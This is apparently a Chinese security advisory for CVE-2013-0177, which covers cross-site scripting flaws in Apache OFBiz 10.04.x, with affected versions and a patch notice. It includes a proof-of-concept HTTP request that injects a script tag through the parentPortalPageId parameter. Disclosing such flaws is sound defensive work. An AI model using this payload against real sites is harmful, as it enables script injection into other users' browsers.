发布日期：2013-01-18
更新日期：2013-01-22

受影响系统：

Apache Group OfBiz 10.4.2
Apache Group OfBiz 10.4.1

描述：

---

BUGTRAQ  ID: 57463
CVE(CAN) ID: CVE-2013-0177

Apache Open For Business（Apache OFBiz）是开源的ERP系统。

Apache OFBiz 10.04.05、11.04.02之前版本存在多个跨站脚本漏洞，攻击者可利用这些漏洞在受影响站点的用户浏览器中执行任意HTML和脚本代码。

<*来源：Juan Caillava
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

GET
/exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE&quot;&amp;gt;&amp;lt;script&amp;gt;alert(&quot;xss&quot;)&amp;lt;/script&amp;gt;
HTTP/1.1
Host: www.example.com:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101
Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer: https://www.example.com:8443/exampleext/control/main?externalLoginKey=EL367731470037
Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002

建议：

---

厂商补丁：

Apache Group
------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://httpd.apache.org/

浏览次数：4912
严重程度：0（网友投票）